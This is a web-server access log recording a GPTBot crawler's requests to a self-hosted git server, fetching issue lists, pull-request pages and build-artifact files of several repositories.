"/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip?display=source" [Client 74.7.227.38] [Length 11786] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:19:37:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:19:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:19:37:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:19:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:19:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 983] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:19:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 9852] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:19:37:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:19:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:19:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10137] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10136] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:37:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11366] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11365] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:19:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig?display=source" [Client 74.7.227.38] [Length 11822] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:19:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:37:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 60411] [Gzip 16.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:19:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11168] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:19:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11288] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:19:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc?display=source" [Client 